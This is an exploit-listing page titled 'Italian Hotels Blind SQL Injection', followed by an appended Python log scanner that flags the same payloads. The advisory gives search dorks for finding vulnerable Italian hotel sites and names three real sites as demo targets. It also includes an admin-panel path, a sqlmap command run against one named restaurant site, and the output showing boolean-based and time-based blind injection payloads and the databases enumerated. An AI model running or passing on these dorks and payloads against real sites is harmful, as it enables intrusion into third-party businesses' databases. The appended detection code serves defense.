Italian Hotels Blind SQL Injection vulnerability - CXSecurity.com

Vulnerability ID 1841735 Vulnerability type
Published 2019-11-30 Updated 2019-11-30
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019110181
|Vulnerability details
Vulnerability details have not yet been disclosed
|Vulnerability EXP
# Exploit Title: Italian Hotels Blind SQL Injection vulnerability
# Date: 30/11/2019
# Dork: inurl:camere-dettaglio.php?id= site:.it
        inurl:restaurant-news-detail.php?id= site:.it
        inurl:rooms-suites.php?id= site:.it 
        inurl:room.php?id= site:.it
# Exploit Author: H9xHacker
# Tested on: Linux

Reverse check bing.com

ip:151.11.51.124 .php?id= (There are 202 domains hosted on this server.)

# Demo
ristorantelaspada.it/en/restaurant-news-detail.php?id=32
lungarnovespucci50.com/en/camere-dettaglio.php?id=9
hotelbeyfin.com/de/rooms-suites.php?id=27

# Admin control panel path

http://www.website.com/cms-admin/

OR

http://www.website.it/cms-admin/

# PoC:

sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'http://ristorantelaspada.it/en/restaurant-news-detail.php?id=32' --no-cast --batch --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=32' AND 2568=2568-- AtOc

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: id=32' OR (SELECT 9574 FROM (SELECT(SLEEP(5)))kdFW)-- xPIg
---
web application technology: Apache, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] information_schema
[*] ristorantelaspada_it_01
------------------------

Greets:Black Hat Hackers
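
A log-side check for the two payload shapes in the sqlmap output above, as an added example that is not part of the original advisory: it scans Apache access-log lines for `id` values that are not plain integers and labels the boolean-based and time-based patterns. The log lines, client IPs and the `NUMERIC_PARAMS` set are constructed assumptions; the paths and payload shapes are the ones shown on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines (documentation IP ranges) for the demo.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Nov/2019:10:00:01 +0100] "GET /en/restaurant-news-detail.php?id=32 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [30/Nov/2019:10:00:05 +0100] "GET /en/restaurant-news-detail.php?id=32%27%20AND%202568%3D2568--%20AtOc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [30/Nov/2019:10:00:09 +0100] "GET /en/restaurant-news-detail.php?id=32%27%20OR%20(SELECT%209574%20FROM%20(SELECT(SLEEP(5)))kdFW)--%20xPIg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [30/Nov/2019:10:01:00 +0100] "GET /en/camere-dettaglio.php?id=9&lang=en HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[0-9.]+"')
TIME_BASED = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)
BOOLEAN = re.compile(r"\b(?:and|or)\b\s+\(?\s*\d+\s*=\s*\d+", re.I)
NUMERIC_PARAMS = {"id"}  # assumption: these parameters only ever carry integers


def classify(value):
    """Return None for a clean integer, else a label for the anomaly."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    if TIME_BASED.search(value):
        return "time-based blind"
    if BOOLEAN.search(value):
        return "boolean-based blind"
    return "non-integer value"


def scan(log_text):
    """Return (client_ip, path, param, label) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        # parse_qs percent-decodes values, so encoded quotes and spaces are seen.
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            if name not in NUMERIC_PARAMS:
                continue
            for value in values:
                label = classify(value)
                if label:
                    findings.append((ip, url.path, name, label))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Both probes return HTTP 200 with the same body size as the legitimate request, so status-code alerting alone would miss them; the decoded parameter value is what distinguishes them.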